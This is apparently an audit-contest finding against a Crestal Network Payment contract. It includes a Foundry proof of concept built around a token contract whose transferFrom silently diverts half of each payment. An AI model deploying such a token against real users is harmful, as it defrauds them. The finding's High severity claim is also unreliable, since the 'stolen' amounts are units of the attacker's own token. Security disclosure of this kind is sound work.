Creamy Aqua Cyborg

High

# Malicious ERC20 Tokens Can Steal User Funds Through Payment System

### Summary

The lack of token validation in payment functions will cause financial loss for users as malicious ERC20 tokens can steal funds when used in transactions.


### Root Cause

In the Payment contract, the payWithERC20 function accepts any address as a token without validating its legitimacy or behavior. This allows malicious token contracts to be used in transactions, potentially stealing funds or causing other unexpected behavior:

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L23-L33

### Internal Pre-conditions

1. Victim needs to interact with a function payWithERC20
2. The function needs to accept an arbitrary token address as input


### External Pre-conditions

1. A malicious token contract needs to exist on the network

### Attack Path

1. Attacker creates a malicious ERC20 token that implements the standard interface but contains hidden malicious logic
2. The malicious token appears legitimate but its transferFrom function is designed to steal a portion of the transferred funds
3. Attacker convinces victims to use this token for payments in the platform
4. When victims make payments with this token, the malicious transferFrom function
5. Transfers only a portion of the specified amount to the recipient
6. Diverts the remaining funds to the attacker's wallet
7. Returns true to indicate success, hiding the theft


### Impact

Victims suffer direct financial loss when using malicious tokens. For example, if a victim attempts to transfer 100 tokens to another user, the malicious token might only transfer 50 tokens to the intended recipient while stealing the other 50 tokens. This theft occurs silently, with no indication to the victim that anything is wrong.
The severity is high because:

1. Victims lose actual funds
2. The theft is difficult to detect without careful monitoring
3. The platform appears to be functioning normally despite the theft
4. Multiple victims can be affected if the malicious token gains popularity


### PoC

```solidity
// SPDX-License-Identifier: GPL-3.0-or-later
pragma solidity ^0.8.26;

import "forge-std/Test.sol";
import "../src/Payment.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";

contract MaliciousToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    function mint(address to, uint256 amount) public {
        balanceOf[to] += amount;
    }

    function approve(address spender, uint256 amount) public returns (bool) {
        allowance[msg.sender][spender] = amount;
        return true;
    }

    // Malicious transferFrom that steals funds
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public returns (bool) {
        require(
            allowance[from][msg.sender] >= amount,
            "Insufficient allowance"
        );
        require(balanceOf[from] >= amount, "Insufficient balance");

        // Reduce allowance and balance
        allowance[from][msg.sender] -= amount;
        balanceOf[from] -= amount;

        // Only transfer half the amount, stealing the rest
        uint256 amountToTransfer = amount / 2;
        uint256 amountToSteal = amount - amountToTransfer;

        balanceOf[to] += amountToTransfer;
        balanceOf[address(this)] += amountToSteal; // Steal funds

        return true;
    }
}

contract PaymentValidationTest is Test {
    Payment public payment;
    MaliciousToken public maliciousToken;
    address public victim; // The user who loses funds
    address public recipient; // The intended recipient
    address public attacker; // The malicious token contract itself

    function setUp() public {
        payment = new Payment();
        maliciousToken = new MaliciousToken();

        victim = address(0x1);
        recipient = address(0x2);
        attacker = address(maliciousToken);

        // Fund victim with tokens
        maliciousToken.mint(victim, 1000);

        // Victim approves payment contract
        vm.prank(victim);
        maliciousToken.approve(address(payment), 1000);
    }

    function testMaliciousToken() public {
        // Initial balances
        uint256 initialVictimBalance = maliciousToken.balanceOf(victim);
        uint256 initialRecipientBalance = maliciousToken.balanceOf(recipient);

        // Victim attempts to make a payment
        vm.prank(victim);
        payment.payWithERC20(address(maliciousToken), 100, victim, recipient);

        // Check balances after payment
        uint256 finalVictimBalance = maliciousToken.balanceOf(victim);
        uint256 finalRecipientBalance = maliciousToken.balanceOf(recipient);
        uint256 stolenAmount = maliciousToken.balanceOf(attacker);

        // Victim lost 100 tokens
        assertEq(
            initialVictimBalance - finalVictimBalance,
            100,
            "Victim lost full amount (100 tokens)"
        );

        // But recipient only received 50 tokens
        assertEq(
            finalRecipientBalance - initialRecipientBalance,
            50,
            "Recipient only received half (50 tokens)"
        );

        // The other 50 tokens were stolen by the attacker
        assertEq(
            stolenAmount,
            50,
            "Attacker stole half the amount (50 tokens)"
        );
    }
}
```

### Mitigation

Implement token validation and safety measures:
1. Token Whitelist: Only allow pre-approved tokens to be used for payments.
2. Balance Verification: Check balances before and after transfers to ensure the correct amount was transferred.
3. Contract Verification: Verify the token address is a contract with the expected behavior.